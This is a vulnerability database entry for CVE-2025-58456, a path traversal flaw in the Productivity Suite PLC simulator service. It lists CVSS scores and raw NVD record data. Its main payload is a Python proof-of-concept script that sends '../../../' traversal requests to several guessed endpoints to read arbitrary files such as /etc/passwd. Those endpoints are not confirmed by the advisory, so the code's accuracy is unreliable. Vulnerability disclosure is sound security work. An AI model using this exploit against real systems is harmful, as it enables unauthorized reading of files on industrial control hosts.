Security Vulnerability Report
中文
CVE-2025-58456 CVSS 6.8 MEDIUM

CVE-2025-58456

Published: 2025-10-23 22:15:41
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A relative path traversal vulnerability was discovered in Productivity Suite software version 4.4.1.19. The vulnerability allows an unauthenticated remote attacker to interact with the ProductivityService PLC simulator and read arbitrary files on the target machine.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Productivity Suite < 4.4.1.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-58456 Path Traversal PoC # Target: Productivity Suite < 4.4.1.19 # Vulnerability: Relative Path Traversal in ProductivityService def exploit_path_traversal(target_url, file_path): """ Exploit path traversal vulnerability to read arbitrary files """ # Construct malicious URL with path traversal payload traversal_payload = f"../../../{file_path}" # Try different common endpoints endpoints = [ "/ProductivityService/api/file/read", "/ProductivityService/api/files", "/api/ProductivityService/file", "/ProductivityService/fileaccess" ] for endpoint in endpoints: try: # Method 1: GET request with path parameter params = {"path": traversal_payload} response = requests.get(f"{target_url}{endpoint}", params=params, timeout=10) if response.status_code == 200 and len(response.text) > 0: print(f"[!] Success! File content from {file_path}:") print(response.text) return True # Method 2: POST request with JSON body json_data = {"filePath": traversal_payload} response = requests.post(f"{target_url}{endpoint}", json=json_data, timeout=10) if response.status_code == 200 and len(response.text) > 0: print(f"[!] Success! File content from {file_path}:") print(response.text) return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-58456.py <target_url> <file_path>") print("Example: python cve-2025-58456.py http://target:8080 /etc/passwd") sys.exit(1) target = sys.argv[1] file_to_read = sys.argv[2] print(f"[*] Exploiting CVE-2025-58456 on {target}") print(f"[*] Attempting to read: {file_to_read}") if not exploit_path_traversal(target, file_to_read): print("[-] Exploitation failed - target may not be vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58456", "sourceIdentifier": "[email protected]", "published": "2025-10-23T22:15:41.470", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A relative path traversal vulnerability was discovered in Productivity Suite software version \n\n4.4.1.19.\n\n The vulnerability allows an unauthenticated remote attacker to interact with the ProductivityService PLC simulator and read arbitrary files on the target machine."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-296-01.json", "source": "[email protected]"}, {"url": "https://support.automationdirect.com/docs/securityconsiderations.pdf", "source": "[email protected]"}, {"url": "https://www.automationdirect.com/support/software-downloads", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-296-01", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.